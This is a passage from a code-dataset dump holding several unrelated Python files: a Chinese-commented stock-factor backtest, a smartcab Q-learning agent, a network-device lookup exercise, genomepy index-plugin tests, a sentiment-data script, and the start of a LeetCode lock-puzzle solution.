date.strftime('%Y-%m-%d')\n index = series.dropna().index\n y = series.dropna()\n # print(len(y))\n # 这里开始有问题\n dummy_var = pd.get_dummies(industry_label.loc[date]).drop([0], axis=1)\n # dummy_var = get_industry_exposure(industry_label.columns, industry_label, date).T\n ind_dummy = dummy_var.loc[index]\n # print(len(ind_dummy))\n\n # 对齐处理\n mkt_value = market_value.loc[date]\n mkt_value = mkt_value[index]\n # print(len(mkt_value))\n # 原先的做法 先保留\n # mkt_value = market_value.loc[date].replace(0,np.nan)\n # mkt_value = mkt_value.dropna()\n # print(len(mkt_value))\n\n x = pd.concat([mkt_value,ind_dummy],axis=1) # 市值中性化+行业中性化\n x[np.isnan(x)] = 0\n x[np.isinf(x)] = 0\n result = sm.OLS(y.astype(float), x.astype(float)).fit()\n residue = result.resid\n return residue\n\n\n# # 重新填充中性化后的因子值表(行业中性化)\n# def set_new_factor_df(standardize_factor,industry_label):\n# d = []\n# for date in standardize_factor.index:\n# date = date.strftime('%Y-%m-%d')\n# stock_index = standardize_factor.loc[date].dropna().index\n# initList = [[np.nan for x in range(len(standardize_factor.columns))]]\n# temp = pd.DataFrame(initList, columns=standardize_factor.columns)\n# series = neutralization(standardize_factor.loc[date], industry_label)\n# temp[stock_index] = [series.values]\n# d.append(temp.values[0])\n# result = pd.DataFrame(d,index = standardize_factor.index, columns=standardize_factor.columns)\n# return result\n\n# 重新填充中性化后的因子值表(行业+市值中性化)\ndef set_new_factor_df(standardize_factor,industry_label,market_value):\n d = []\n for date in standardize_factor.index:\n date = date.strftime('%Y-%m-%d')\n stock_index = standardize_factor.loc[date].dropna().index\n initList = [[np.nan for x in range(len(standardize_factor.columns))]]\n temp = pd.DataFrame(initList, columns=standardize_factor.columns)\n series = neutralization(standardize_factor.loc[date], industry_label, market_value)\n temp[stock_index] = [series.values]\n d.append(temp.values[0])\n result = pd.DataFrame(d,index = standardize_factor.index, columns=standardize_factor.columns)\n return result\n\n\n\n# 第四步:因子评价体系\n# 4.1 IC评价体系\n# 计算序列大于n的概率\ndef larger_than_prob(series,n):\n count = 0\n for x in series:\n if x >= n:\n count = count+1\n else:\n continue\n prob = count/len(series)\n return prob\n\n# 计算平均年化收益率\ndef annul_return_am(n2,t):\n x = math.pow(math.pow(n2,1/t),240) - 1\n return x\n\n\n# 计算最大回撤率(好像有点问题?)\ndef max_drawback(series):\n series = series.tolist()\n m_drawback = []\n for n in range(0,len(series)):\n find_max = max(series[0:n+1])\n index = series.index(find_max)\n find_min = min(series[index:n+1])\n drawback = (find_max-find_min)/find_max\n m_drawback.append(drawback)\n max_drawback = max(m_drawback)\n # print(m_drawback.index(max_drawback))\n return max_drawback\n\n# 计算夏普比\ndef sharpe_ratio(series,last_value):\n std = series.std() * (240 ** 0.5)\n list = series.tolist()\n r = annul_return_am(last_value,3688)\n sharpe_ratio = r/std\n return sharpe_ratio\n\n# 计算年化波动率\ndef annul_volatility(series):\n std = series.std() * (240 ** 0.5)\n return std\n\n\n\n# 4.2 分组回溯法\n# 将传入的股票池list分为5个等长度的组合\ndef div_group(series):\n series = series.dropna()\n # print(\"当前调仓日可交易股票总数量为:\" + str(len(series)))\n k = len(series) % 5 #求余\n new_series = series.sort_values()[0:len(series)-k]\n num_single_group = len(new_series) / 5\n # print(\"每一组的长度为:\" + str(num_single_group))\n new_series_index = new_series.index.to_list()\n num_single_group = int(num_single_group)\n group1 = new_series_index[0:num_single_group] # 因子值最小的组\n group2 = new_series_index[num_single_group:2*num_single_group]\n group3 = new_series_index[2*num_single_group:3*num_single_group]\n group4 = new_series_index[3*num_single_group:4*num_single_group]\n group5 = new_series_index[4*num_single_group:5*num_single_group] # 因子值最大的组\n dict = {'group1':group1,\n 'group2':group2,\n 'group3':group3,\n 'group4':group4,\n 'group5':group5}\n return dict\n\n# 挑选出月调仓日\ndef sel_monthly_trade_date(df,index):\n list = []\n for x in index:\n tempt_df = df.loc[x]\n first_day = tempt_df.iloc[0]\n list.append(first_day.name)\n return list\n\n# 根据股票日收益率计算出复利月收益率\ndef monthly_comp_return(df,index):\n print(\"股票复利月收益率如下:\")\n dict = {}\n for x in index:\n tempt_df = df.loc[x]\n first_day = tempt_df.iloc[0]\n for stock in tempt_df.columns:\n for n in tempt_df.index:\n first_day[stock] = first_day[stock] * (1 + tempt_df.loc[n][stock])\n dict[x] = first_day\n\n dict = pd.DataFrame(dict)\n return dict\n\n# 获取输入日期对应的当月第一个交易日日期\ndef get_first_day(df,index):\n index = index.strftime('%Y-%m')\n tempt_df = df.loc[index]\n first_day = tempt_df.iloc[0]\n first_day_index = first_day.name\n first_day_index = first_day_index.strftime('%Y-%m-%d')\n return first_day_index\n\n\n\n\nif __name__ == '__main__':\n # EP因子\n print(\"-------------EP因子测试开始----------\")\n # 市值MV\n f_date_number = datenum_to_list(factor1)\n new_date = date\n factor1 = pd.DataFrame(factor1['MV'],columns=array_to_list(factor1,'RICs')) # 读取MV因子值\n factor1 = factor1[0:len(new_date)]\n factor1.index = new_date['date']\n stocks=factor1.columns & stock(DayPrice_stock).columns # 取原股票池和市值因子MV股票池的交集\n factor1=factor1[stocks]\n # print(\"取股票池交集后,市值因子MV的因子DateFrame如下:\")\n # print(factor1) # 初始因子值DataFrame\n # print(\"总期数:\"+str(len(factor1)))\n # print(\"股票池数量:\"+str(len(factor1.columns)))\n\n\n # 归母净利润TTM因子\n factor2 = to_daily_freq(statementDatesDeal(profit[10:]),date['date'])\n # print(factor2)\n\n\n # EP因子\n factor = factor2/factor1\n print(factor)\n\n\n # MAD中位数去极值\n for x in factor.index:\n factor.loc[x] = filter_extreme_MAD(factor.loc[x])\n # print(\"经过中性化去极值后的因子值表:\")\n # print(factor)\n\n\n # Z-score标准化\n # 多加一步 把0替换成NaN\n factor = factor.replace(0, np.nan)\n standardize_factor =pd.DataFrame(stats.zscore(factor,nan_policy='omit',axis=1),columns=factor.columns,index=factor.index)\n # print(\"MAD去极值、Z-score标准化处理后的因子值表:\")\n # print(standardize_factor)\n\n\n # 行业中性化\n industry_df = industry['CSLv1']\n industry_df = pd.DataFrame(industry_df)\n industry_date_num = datenum_to_list(industry)\n ind_start = industry_date_num.index(start_date_num) + 1\n ind_end = industry_date_num.index(end_date_num) + 2\n industry_label = industry_df.iloc[ind_start:ind_end]\n industry_label.index = standardize_factor.index\n industry_label.columns = standardize_factor.columns\n # print(industry_label)\n\n\n # 行业中性化运算\n # start = time.time()\n print(\"行业中性化开始\")\n new_factor_df = set_new_factor_df(standardize_factor[0:100], industry_label[0:100], factor1[0:100])\n # new_factor_df.to_csv('ep_neu.csv')\n print(\"行业中性化结束\")\n # end = time.time()\n\n\n\n # 直接读取行业中性化结果\n # print(\"行业中性化后的因子值表:\")\n # new_factor_df = pd.read_csv('factor_neu.csv')\n # new_factor_df.index = pd.to_datetime(new_factor_df['date'])\n # new_factor_df = new_factor_df.drop(['date'],axis=1)\n # print(new_factor_df)\n\n\n # 对行业中性化之后的因子值表再做一次Z-score标准化\n new_factor_std_df = pd.DataFrame(stats.zscore(new_factor_df, nan_policy='omit',axis=1), columns=new_factor_df.columns,\n index=new_factor_df.index)\n print(\"再做一次Z-score标准化后得到的因子值表:\")\n print(new_factor_std_df)\n\n\n # 对股票原始价格进行后复权处理,用后复权价计算日收益率\n AF = DayPrice_stock['AF']\n reright_price = stock(DayPrice_stock) * AF\n # print(\"复权后价格:\")\n # print(reright_price)\n stock_return = reright_price.pct_change(periods=1) # 对应的日收益率表(复权价)\n stock_return = stock_return.loc[factor.index]\n stock_return = stock_return.fillna(0)\n print(\"复权价计算的股票池日收益率:\")\n print(stock_return)\n\n\n # 因子评价体系开始\n # 1. 回归法\n factor_return = [] # 因子收益率序列\n t_values = [] # t值序列\n for n in new_factor_std_df.index:\n x = new_factor_std_df.loc[n].dropna()\n y = stock_return.loc[n].dropna()\n index = x.index & y.index\n x = x.loc[index]\n y = y.loc[index]\n x = sm.add_constant(x)\n est = sm.OLS(y,x)\n model = est.fit()\n factor_return.append(model.params[n])\n t_values.append(model.tvalues[n])\n\n print(\"1. 回归法\")\n a = larger_than_prob(pd.Series(factor_return),0)\n b = pd.Series(factor_return).mean()\n c = pd.Series(t_values).mean()\n d = larger_than_prob(abs(pd.Series(t_values)),0)\n e = larger_than_prob(abs(pd.Series(t_values)),2)\n print(\"因子收益率大于0的概率:\"+str(a))\n print(\"因子收益率均值:\"+str(b))\n print(\"t值绝对值的均值:\"+str(c))\n print(\"t值绝对值大于0的概率:\"+str(d))\n print(\"t值绝对值大于2的概率:\" + str(e))\n\n\n # 2. IC体系:初步检验\n # normal IC\n normal_IC = [] # normal IC 序列\n count = -1\n for n in new_factor_std_df.index:\n count = count + 1 #目前的位置\n if count != len(new_factor_std_df)-1:\n # x = new_factor_std_df.loc[n].dropna()\n x = new_factor_df.loc[n].dropna()\n y = stock_return.iloc[count+1].dropna()\n index = x.index & y.index\n x = x.loc[index]\n y = y.loc[index]\n df = pd.DataFrame({'factor': x, 'return': y})\n corr_array = df.corr(method='pearson')\n corr = corr_array.loc['factor']['return']\n normal_IC.append(corr)\n else:\n break\n\n print(\"2. IC检验体系:\")\n normal_IC = pd.Series(normal_IC)\n normal_IC_mean = normal_IC.mean()\n normal_IC_std = normal_IC.std()\n normal_IC_IR = normal_IC_mean/normal_IC_std\n a = larger_than_prob(normal_IC,0)\n b = larger_than_prob(abs(normal_IC),0.02)\n print(\"IC均值为:\"+str(normal_IC_mean))\n print(\"IC标准差为:\"+str(normal_IC_std))\n print(\"IC>0的比例:\"+str(a))\n print(\"IC绝对值大于0.02的比例:\"+str(b))\n print(\"IR为:\"+str(normal_IC_IR))\n\n\n # 3. 分组回溯法\n print(\"3. 分组回溯法\")\n # 挑出月调仓日\n tempt = new_factor_std_df.resample('M').sum()\n tempt = tempt.reset_index()\n tempt.index = tempt['date'].apply(lambda x: x.strftime('%Y-%m'))\n monthly_trade_date = sel_monthly_trade_date(new_factor_std_df,tempt.index)\n # print(\"所有月调仓日如下:\")\n # print(monthly_trade_date)\n print(\"回溯期内共交易\"+str(len(monthly_trade_date))+\"次\")\n\n # 存储183次调仓 每次调仓的分组结果\n portfolio = {}\n for n in monthly_trade_date:\n n = n.strftime(\"%Y-%m-%d\")\n x = div_group(new_factor_std_df.loc[n])\n portfolio[n] = x\n\n \"\"\"\n 成功获得在183个月调仓日上根据因子值大小划分的五个组的股票组合\n 存在portfolio字典内 可通过日期调用\n group1因子值最小 group5因子值最大\n \"\"\"\n\n # 计算五个组每日收益率\n new_dict = {}\n daily_date = stock_return.index\n for n in daily_date[0:100]: # 先用调仓日当天测试\n n_firstday = get_first_day(stock_return, n)\n n = n.strftime(\"%Y-%m-%d\")\n list = []\n for s in ['group1','group2','group3','group4','group5']:\n group = portfolio[n_firstday][s]\n group_return = 0\n weight = 1/len(group)\n NaN_stock_return_list = []\n for x in group:\n group_return = group_return + weight * stock_return.loc[n][x] # 将NaN替换成0 跳过if判断条件\n list.append(group_return)\n new_dict[n] = list\n\n\n # 跑数据的时候用\n date_return_df = pd.DataFrame(new_dict,index=['group1','group2','group3','group4','group5'])\n date_return_df.columns.name = 'date'\n date_return_df = date_return_df.T\n date_return_df['top_bottom'] = (date_return_df['group1'] - date_return_df['group5']) / 2\n print(date_return_df)\n # date_return_df.to_csv(\"ep_date_return.csv\")\n date_return_df.index = pd.to_datetime(date_return_df.index)\n\n # date_return_df.index.name = 'date'\n # date_return_df = date_return_df.reindex()\n # print(date_return_df)\n # print(date_return_df.index.dtype)\n\n\n # 直接读取已经跑好的数据\n # date_return_df = pd.read_csv(\"date_return_df_reright.csv\")\n # date_return_df.index = pd.to_datetime(date_return_df['date'])\n # date_return_df = date_return_df.drop('date', axis=1)\n\n\n print(\"各组日收益率表如下:\")\n print(date_return_df)\n print(date_return_df.index.dtype)\n new_date_return_df = date_return_df + 1\n\n # 计算净值变化\n net_value_df = new_date_return_df.copy(deep=True)\n net_value_df['net_value_g1'] = net_value_df['group1'].cumprod(axis=0)\n net_value_df['net_value_g2'] = net_value_df['group2'].cumprod(axis=0)\n net_value_df['net_value_g3'] = net_value_df['group3'].cumprod(axis=0)\n net_value_df['net_value_g4'] = net_value_df['group4'].cumprod(axis=0)\n net_value_df['net_value_g5'] = net_value_df['group5'].cumprod(axis=0)\n net_value_df['net_value_tb'] = net_value_df['top_bottom'].cumprod(axis=0)\n # net_value_df['relative_intensity'] = net_value_df['net_value_g1']/net_value_df['net_value_g5']\n # net_value_df.to_csv(\"ep_net_value.csv\")\n net_value_df = net_value_df.drop(['group1','group2','group3','group4','group5','top_bottom'],axis=1)\n print(\"各组净值变化情况如下:\")\n print(net_value_df)\n net_value_df.plot() # 绘制净值曲线图\n plt.show()\n\n length = len(date_return_df)\n annul_return_am_g1 = annul_return_am(net_value_df.iloc[-1]['net_value_g1'],length)\n annul_return_am_g2 = annul_return_am(net_value_df.iloc[-1]['net_value_g2'], length)\n annul_return_am_g3 = annul_return_am(net_value_df.iloc[-1]['net_value_g3'], length)\n annul_return_am_g4 = annul_return_am(net_value_df.iloc[-1]['net_value_g4'], length)\n annul_return_am_g5 = annul_return_am(net_value_df.iloc[-1]['net_value_g5'], length)\n annul_return_am_tb = annul_return_am(net_value_df.iloc[-1]['net_value_tb'], length)\n annul_return_am_list = [annul_return_am_g1,annul_return_am_g2,annul_return_am_g3,annul_return_am_g4,annul_return_am_g5,annul_return_am_tb]\n print(\"各组的平均年化收益率为:\")\n print(annul_return_am_list)\n\n # 计算最大回撤\n m_drawback_g1 = max_drawback(net_value_df['net_value_g1'])\n m_drawback_g2 = max_drawback(net_value_df['net_value_g2'])\n m_drawback_g3 = max_drawback(net_value_df['net_value_g3'])\n m_drawback_g4 = max_drawback(net_value_df['net_value_g4'])\n m_drawback_g5 = max_drawback(net_value_df['net_value_g5'])\n m_drawback_tb = max_drawback(net_value_df['net_value_tb'])\n m_drawback_list = [m_drawback_g1,m_drawback_g2,m_drawback_g3,m_drawback_g4,m_drawback_g5,m_drawback_tb]\n print(\"各组的最大回撤率为:\")\n print(m_drawback_list)\n\n # 计算夏普比\n sharpe_ratio_g1 = sharpe_ratio(date_return_df['group1'],net_value_df.iloc[-1]['net_value_g1'])\n sharpe_ratio_g2 = sharpe_ratio(date_return_df['group2'],net_value_df.iloc[-1]['net_value_g2'])\n sharpe_ratio_g3 = sharpe_ratio(date_return_df['group3'],net_value_df.iloc[-1]['net_value_g3'])\n sharpe_ratio_g4 = sharpe_ratio(date_return_df['group4'],net_value_df.iloc[-1]['net_value_g4'])\n sharpe_ratio_g5 = sharpe_ratio(date_return_df['group5'],net_value_df.iloc[-1]['net_value_g5'])\n sharpe_ratio_tb = sharpe_ratio(date_return_df['top_bottom'], net_value_df.iloc[-1]['net_value_tb'])\n sharpe_ratio_list = [sharpe_ratio_g1,sharpe_ratio_g2,sharpe_ratio_g3,sharpe_ratio_g4,sharpe_ratio_g5,sharpe_ratio_tb]\n print(\"各组的夏普比为:\")\n print(sharpe_ratio_list)\n\n\n\n # time_end = time.time()\n # print('程序运行共需' + str(end - start) + '秒')\n\n\n\n\n\n\n\n","sub_path":"EP.py","file_name":"EP.py","file_ext":"py","file_size_in_byte":23102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"182641857","text":"import random\nfrom environment import Agent, Environment\nfrom planner import RoutePlanner\nfrom simulator import Simulator\nfrom collections import namedtuple\nimport pprint as pp\n\nclass LearningAgent(Agent):\n \"\"\"An agent that learns to drive in the smartcab world.\"\"\"\n\n def __init__(self, env):\n super(LearningAgent, self).__init__(env) # sets self.env = env, state = None, next_waypoint = None, and a default color\n self.color = 'red' # override color\n self.planner = RoutePlanner(self.env, self) # simple route planner to get next_waypoint\n # TODO: Initialize any additional variables here\n self.learningAgentState = namedtuple(\n 'learningAgentState',\n # ['light', 'light_violation', 'row', 'next_waypoint', 'hurry'])\n ['light', 'light_violation', 'row', 'next_waypoint'])\n self.actions = [None, 'forward', 'left', 'right']\n self.qTable = {}\n self.logfile = open('c:\\\\agent_log_file'+'.txt', 'w')\n self.num_moves = 0\n self.reach_dest = 0\n self.current_trial = 0\n self.penalty = 0\n self.n_trials = 100\n\n self.alpha = .8\n self.gamma = .9\n self.e = .7\n\n\n def reset(self, destination=None):\n self.planner.route_to(destination)\n # TODO: Prepare for a new trip; reset any variables here, if required\n self.state = self.learningAgentState(light=None, light_violation=None,\n row=None, next_waypoint=None)\n # hurry=None)\n\n @staticmethod\n def has_right_of_way(inputs, next_waypoint):\n \"\"\"A static function to check if the aent has right-of-way.\"\"\"\n if (next_waypoint == 'left' and inputs['light'] == 'green' and inputs['oncoming'] == 'forward'):\n return 'no_left'\n elif (next_waypoint == 'right' and inputs['light'] == 'red' and\n (inputs['oncoming'] == 'left' or inputs['left'] == 'forward')):\n return 'no_right'\n else:\n return 'has_row'\n\n @staticmethod\n def is_violating_light(light, next_waypoint):\n \"\"\"A static function to check if the agent is violating the traffic signal light.\"\"\"\n if (light == 'red' and next_waypoint is not 'right'):\n return 1\n else:\n return 0\n\n @staticmethod\n def is_late(deadline):\n \"\"\"A static function to check if agent is running out of moves.\"\"\"\n if deadline < 5:\n return 1\n else:\n return 0\n\n def to_action(self, x):\n \"\"\"Converts the location of a provided list to its corresponding action.\"\"\"\n return {\n '0': None,\n '1': 'forward',\n '2': 'left',\n '3': 'right'\n }[x]\n\n def to_pos(self, x):\n \"\"\"Conversts an action to its corresponding location in a list.\"\"\"\n return {\n 'None': 0,\n 'forward': 1,\n 'left': 2,\n 'right': 3\n }[x]\n\n def beOptimistic(self, state):\n \"\"\"Modifies the value of an action to encourage the agent to try it.\"\"\"\n values = self.qTable[state]\n m = max(values)\n for i, v in enumerate(values):\n if (v == 0):\n self.qTable[state][i] = m + .05\n break\n\n def get_action(self, state):\n \"\"\"Determines the action of the agent, either try new action or choose best previous action.\"\"\"\n try:\n k=state.index(0)\n return self.to_action( str(k) )\n except ValueError:\n return self.to_action(str(state.index(max(state))))\n\n # def get_action(self, state):\n # curr_e = self.e * ( float(self.n_trials - self.current_trial)/self.n_trials )\n # if random.random() > curr_e:\n # return self.to_action(str(state.index(max(state))))\n # else:\n # return random.choice(self.actions)\n\n def get_success_rate(self):\n return \"{}/{} = %{}\".format(self.reach_dest,\n self.current_trial, (round(float(self.reach_dest)/float(self.current_trial), 3))*100)\n\n def get_penalty_ratio(self):\n return \"{}/{} = %{}\".format(self.penalty, self.num_moves,\n (round(float(self.penalty)/float(self.num_moves),4))*100)\n\n def get_parameters(self):\n return self.alpha, self.gamma, self.e\n\n def update(self, t):\n # Gather inputs\n self.next_waypoint = self.planner.next_waypoint() # from route planner, also displayed by simulator\n inputs = self.env.sense(self)\n deadline = self.env.get_deadline(self)\n\n self.num_moves += 1\n decayingAlpha = self.alpha/self.num_moves\n\n if t == 0:\n self.current_trial += 1\n\n # Update state\n self.state = self.learningAgentState(light=inputs['light'],\n light_violation=self.is_violating_light(inputs['light'], self.next_waypoint),\n row=self.has_right_of_way(inputs, self.next_waypoint),\n next_waypoint=self.next_waypoint)\n # hurry=self.is_late(deadline))\n\n\n # Select action according to your policy\n if self.state not in self.qTable:\n # action = random.choice(self.actions)\n action = self.next_waypoint\n # Initialize new state\n self.qTable[self.state] = [0, 0, 0, 0]\n else:\n sa = self.qTable[self.state]\n # action = self.to_action(str(sa.index(max(sa))))\n action = self.get_action(self.qTable[self.state])\n\n # Execute action and get reward\n reward = self.env.act(self, action)\n # if reward > 5:\n # reward = reward - 10\n\n if reward >= 10:\n self.reach_dest += 1\n elif reward < 10 and reward > 5:\n self.reach_dest += 1\n self.penalty += 1\n elif reward < 0:\n self.penalty += 1\n\n\n # success_rate = \"{}/{} = %{}\".format(self.reach_dest,\n # self.current_trial, (round(float(self.reach_dest)/float(self.current_trial), 3))*100)\n #\n # penalty_ratio = \"{}/{} = %{}\".format(self.penalty, self.num_moves,\n # (round(float(self.penalty)/float(self.num_moves),4))*100)\n #\n # pp.pprint(success_rate, self.logfile)\n # pp.pprint(penalty_ratio, self.logfile)\n\n # Sense environment after action/reward\n inputs_2 = self.env.sense(self)\n deadline_2 = self.env.get_deadline(self)\n next_waypoint_2 = self.planner.next_waypoint()\n\n # store new state\n state_2 = self.learningAgentState(light=inputs_2['light'],\n light_violation=self.is_violating_light(inputs_2['light'], next_waypoint_2),\n row=self.has_right_of_way(inputs_2, next_waypoint_2),\n next_waypoint=next_waypoint_2)\n # hurry=self.is_late(deadline_2))\n\n # Initialize next new state\n if state_2 not in self.qTable:\n self.qTable[state_2] = [0, 0, 0, 0]\n\n # Formula for updating Q-Table\n qsa = (1 - decayingAlpha) * self.qTable[self.state][self.to_pos(str(action))] + decayingAlpha * (reward + self.gamma * max(self.qTable[state_2]))\n\n # Update Q-Table\n self.qTable[self.state][self.to_pos(str(action))] = qsa\n\n # self.beOptimistic(self.state)\n\n # pp.pprint(\"\\n\", self.logfile)\n # pp.pprint(\"LearningAgent.update(): deadline = {}, inputs = {}, action = {}, next_waypoint = {}, reward = {}\".format(deadline, inputs, action, self.next_waypoint, reward), self.logfile) # [debug]\n # pp.pprint(self.qTable, self.logfile)\n # pp.pprint(t, self.logfile)\n # pp.pprint(\"\\n\", self.logfile)\n # TODO: Learn policy based on state, action, reward\n #if inputs['oncoming'] is not None or inputs['right'] is not None or inputs['left'] is not None:\n # print \"LearningAgent.update(): deadline = {}, inputs = {}, action = {}, next_waypoint = {}, reward = {}\".format(deadline, inputs, action, self.next_waypoint, reward) # [debug]\n # print \"Is violating light = {}\".format(self.is_violating_light(inputs['light'], self.next_waypoint))\n # print \"Has right of way = {}\".format(self.has_right_of_way(inputs, self.next_waypoint))\n # print \"Light color = {}\".format(inputs['light'])\n # print \"Should hurry = {}\".format(self.is_late(deadline))\n # print \"\\n\"\n #print self.is_conflict(inputs, self.next_waypoint)\n\n\ndef run():\n \"\"\"Run the agent for a finite number of trials.\"\"\"\n\n # Set up environment and agent\n e = Environment() # create environment (also adds some dummy traffic)\n a = e.create_agent(LearningAgent) # create agent\n e.set_primary_agent(a, enforce_deadline=True) # set agent to track\n\n # Now simulate it\n sim = Simulator(e, update_delay=0.001) # reduce update_delay to speed up simulation\n sim.run(a.n_trials) # press Esc or close pygame window to quit\n\n # pp.pprint(\"Success rate: \", a.logfile)\n # pp.pprint(a.get_success_rate(), a.logfile)\n # pp.pprint(\"Penalty ratio: \", a.logfile)\n # pp.pprint(a.get_penalty_ratio(), a.logfile)\n # pp.pprint(\"Parameters alpha, gamma, and epsilon: \", a.logfile)\n # pp.pprint(a.get_parameters(), a.logfile)\n # pp.pprint(\"Number of states explored: \", a.logfile)\n # pp.pprint(len(a.qTable), a.logfile)\n # pp.pprint(\"Q-Table: \", a.logfile)\n # pp.pprint(a.qTable, a.logfile)\n\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":9383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"316282592","text":"#!/usr/bin/env python\n\nlondon_co = {\n 'r1': {\n 'location': '21 New Globe Walk',\n 'vendor': 'Cisco',\n 'model': '4451',\n 'ios': '15.4',\n 'ip': '10.255.0.1'\n },\n 'r2': {\n 'location': '21 New Globe Walk',\n 'vendor': 'Cisco',\n 'model': '4451',\n 'ios': '15.4',\n 'ip': '10.255.0.2'\n },\n 'sw1': {\n 'location': '21 New Globe Walk',\n 'vendor': 'Cisco',\n 'model': '3850',\n 'ios': '3.6.XE',\n 'ip': '10.255.0.101',\n 'vlans': '10,20,30',\n 'routing': True\n }\n}\n\nkey1 = input('Введите номер устройства: ')\n\n#После ввода номера устройства формируем перечен его параметров в текстовую строку\ndev_params = ','.join(list(london_co[key1].keys()))\n\n#Выводим на стандартный поток вывода запрос параметров устройства с подсказкой\nkey2 = input('Введите имя параметра: (' + dev_params + '): ')\n\n\n#Добавлен метод работы со словарем get, при поиске параметра словаря который отсутствует в словаре\n#get возвращет None, а не ошибку. Через запятую можно указать возвращаемое сообщение\n#вместо значения None по умолчанию\nprint(london_co[key1].get(key2, 'Такого параметра нет'))\n\n","sub_path":"solutions/05_basic_scripts/task_5_1c.py","file_name":"task_5_1c.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"223794736","text":"import os\nimport pytest\nfrom subprocess import check_call\nfrom tempfile import mkdtemp\nfrom shutil import rmtree, copyfile\n\nfrom genomepy.plugin import init_plugins, activate\nfrom genomepy.utils import cmd_ok\nfrom genomepy.functions import Genome\nfrom genomepy.plugins.bwa import BwaPlugin\nfrom genomepy.plugins.gmap import GmapPlugin\nfrom genomepy.plugins.minimap2 import Minimap2Plugin\nfrom genomepy.plugins.bowtie2 import Bowtie2Plugin\nfrom genomepy.plugins.hisat2 import Hisat2Plugin\n\n@pytest.fixture(scope=\"module\")\ndef tempdir():\n \"\"\"Temporary directory.\"\"\" \n tmpdir = mkdtemp()\n yield tmpdir\n rmtree(tmpdir)\n\n@pytest.fixture(scope=\"module\")\ndef genome(tempdir):\n \"\"\"Create a test genome.\"\"\" \n name = \"small_genome\" \n fafile = \"tests/data/small_genome.fa\"\n if os.path.exists(fafile + \".gz\"):\n check_call([\"gunzip\", fafile + \".gz\"])\n\n os.mkdir(os.path.join(tempdir, name))\n copyfile(fafile, os.path.join(tempdir, name, os.path.basename(fafile)))\n for p in init_plugins():\n activate(p)\n yield Genome(name, genome_dir=tempdir) # provide the fixture value\n if os.path.exists(fafile):\n check_call([\"gzip\", fafile])\n\ndef test_bwa(genome):\n \"\"\"Create bwa index.\"\"\" \n assert os.path.exists(genome.filename)\n\n if cmd_ok(\"bwa\"):\n p = Bowtie2Plugin()\n p = BwaPlugin()\n p.after_genome_download(genome)\n dirname = os.path.dirname(genome.filename)\n index_dir = os.path.join(dirname, \"index\" , \"bwa\")\n assert os.path.exists(index_dir)\n assert os.path.exists(os.path.join(index_dir, \"{}.fa.sa\".format(genome.name)))\n\ndef test_minimap2(genome):\n \"\"\"Create minimap2 index.\"\"\" \n assert os.path.exists(genome.filename)\n if cmd_ok(\"minimap2\"):\n p = Minimap2Plugin()\n p.after_genome_download(genome)\n dirname = os.path.dirname(genome.filename)\n index_dir = os.path.join(dirname, \"index\" , \"minimap2\")\n assert os.path.exists(index_dir)\n assert os.path.exists(os.path.join(index_dir, \"{}.mmi\".format(genome.name)))\n\ndef test_bowtie2(genome):\n \"\"\"Create bowtie2 index.\"\"\" \n assert os.path.exists(genome.filename)\n if cmd_ok(\"bowtie2\"):\n p = Bowtie2Plugin()\n p.after_genome_download(genome)\n dirname = os.path.dirname(genome.filename)\n index_dir = os.path.join(dirname, \"index\" , \"bowtie2\")\n assert os.path.exists(index_dir)\n assert os.path.exists(os.path.join(index_dir, \"{}.1.bt2\".format(genome.name)))\n\ndef test_hisat2(genome):\n \"\"\"Create hisat2 index.\"\"\" \n assert os.path.exists(genome.filename)\n if cmd_ok(\"hisat2-build\"):\n p = Hisat2Plugin()\n p.after_genome_download(genome)\n dirname = os.path.dirname(genome.filename)\n index_dir = os.path.join(dirname, \"index\" , \"hisat2\")\n assert os.path.exists(index_dir)\n assert os.path.exists(os.path.join(index_dir, \"{}.1.ht2\".format(genome.name)))\n\ndef test_gmap(genome):\n \"\"\"Create gmap index.\"\"\" \n assert os.path.exists(genome.filename)\n if cmd_ok(\"gmap\"):\n p = GmapPlugin()\n p.after_genome_download(genome)\n dirname = os.path.dirname(genome.filename)\n index_dir = os.path.join(dirname, \"index\" , \"gmap\", genome.name)\n assert os.path.exists(index_dir)\n assert os.path.exists(os.path.join(index_dir, \"{}.version\".format(genome.name)))\n","sub_path":"tests/test_plugins.py","file_name":"test_plugins.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"22047387","text":"import sys\nimport re\n\ndef print_processed(sentence_dict):\n\n\tfor key,line_text in sentence_dict.items():\n\t\tprint(line_text)\n\ndef read_process_input(file_name):\n\n\tregex_split_tokens = re.compile(r\"([0-9]+)\\s+([0-9]+)\\s+(.+)\\s+([0-9]+)$\")\n\twith open(file_name,'r') as file_hdl:\n\n\t\t# skip first line\n\t\tfile_hdl.readline()\n\t\t\n\t\tsentence_dict = {}\n\t\tfor line in file_hdl:\n\t\t\tline = line.strip()\n\n\t\t\tphraseid,sentenceid,sent_text,sentiment_score = regex_split_tokens.match(line).group(1,2,3,4)\n\n\t\t\tif sentenceid not in sentence_dict:\n\t\t\t\tsentence_dict[sentenceid] = sentiment_score + \" \" + sent_text\n\n\tprint_processed(sentence_dict)\n\n\t\t\t\nif __name__ == '__main__':\n\n\t# Main program takes 5 command line arguments -\n\t# \n\t#if len(sys.argv) != 2:\n\t#\tprint(\"Invalid Arguments!\")\n\t#\texit(1)\n\tfolder_name = sys.argv[1]\n\n\tallfiles = glob.glob(folder_name+\"/*.out\")\n\n\tprint(allfiles)\n\t# file_name = sys.argv[1]\n\n\t#read_process_input(file_name)\n\n","sub_path":"Sentiment/create-train-sent_old.py","file_name":"create-train-sent_old.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"367462594","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Wei, Shuowen\n\nhttps://leetcode.com/problems/open-the-lock/\n\nhttps://labuladong.gitee.io/algo/4/29/113/\n\nLC111, LC752, LC773\n- BFS\n\"\"\"\nclass Solution(object):\n def openLock(self, deadends, target):\n \"\"\"\n :type deadends: List[str]\n :type target: str\n :rtype: int\n \"\"\"\n from 